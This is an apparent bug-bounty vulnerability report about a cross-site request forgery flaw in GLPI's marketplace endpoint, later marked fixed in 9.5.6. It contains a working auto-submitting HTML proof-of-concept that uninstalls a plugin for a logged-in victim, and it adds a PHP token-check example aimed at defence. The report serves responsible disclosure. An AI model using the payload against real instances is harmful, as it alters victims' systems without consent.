Cross-Site Request Forgery (CSRF) in glpi-project/glpi
Sep 10th 2021
Hello dear GLPI team, I found one more CSRF vulnerability.
Proof of Concept
1. First, the user should already be logged in, in Firefox or Safari.
2. Open PoC.html and click the submit button (it can also be auto-submitted).
3. The pdf plugin will be uninstalled after clicking the submit button in the PoC.html file.
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://nocompany.with7.glpi-network.cloud/ajax/marketplace.php">
      <input type="hidden" name="action" value="uninstall_plugin" />
      <input type="hidden" name="key" value="pdf" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms.submit();
    </script>
  </body>
</html>
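The PoC form above has no method attribute, so the browser sends the state-changing request as a GET with the victim's session cookie attached. The following is an added example, not GLPI's code and not the fix shipped in 9.5.6, of the server-side check that rejects such a request; the function names and the `_csrf_token` field are hypothetical.

```php
<?php
// Added example; not GLPI code. Function and field names are hypothetical.

/** Issue a per-session anti-CSRF token and store it server-side in the session array. */
function issue_csrf_token(array &$session): string
{
    $session['csrf_token'] = bin2hex(random_bytes(32));
    return $session['csrf_token'];
}

/**
 * Decide whether a state-changing request may proceed.
 * Returns an HTTP status code: 200 to proceed, 405 or 403 to reject.
 */
function check_state_change(string $method, array $post, array $session): int
{
    // 1. State changes must not be reachable via GET: a plain form on another
    //    origin can trigger a GET that carries the victim's cookies.
    if ($method !== 'POST') {
        return 405;
    }
    // 2. The request body must carry the token bound to this session.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['_csrf_token'] ?? '';
    if (!is_string($supplied) || $expected === '' || !hash_equals($expected, $supplied)) {
        return 403;
    }
    return 200;
}

// Constructed sample requests (not captured traffic).
$session = [];
$token = issue_csrf_token($session);
$body = ['action' => 'uninstall_plugin', 'key' => 'pdf'];

$requests = [
    'cross-site GET, as in the PoC form' => ['GET', []],
    'cross-site POST without token'      => ['POST', $body],
    'POST with a guessed token'          => ['POST', $body + ['_csrf_token' => str_repeat('0', 64)]],
    'same-site POST with session token'  => ['POST', $body + ['_csrf_token' => $token]],
];
foreach ($requests as $label => [$method, $post]) {
    printf("%-36s -> %d\n", $label, check_state_change($method, $post, $session));
}
```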
A glpi-project/glpi maintainer validated this vulnerability 2 years ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
François Legastelois marked this as fixed in 9.5.6 with commit 93750e a year ago
This vulnerability will not receive a CVE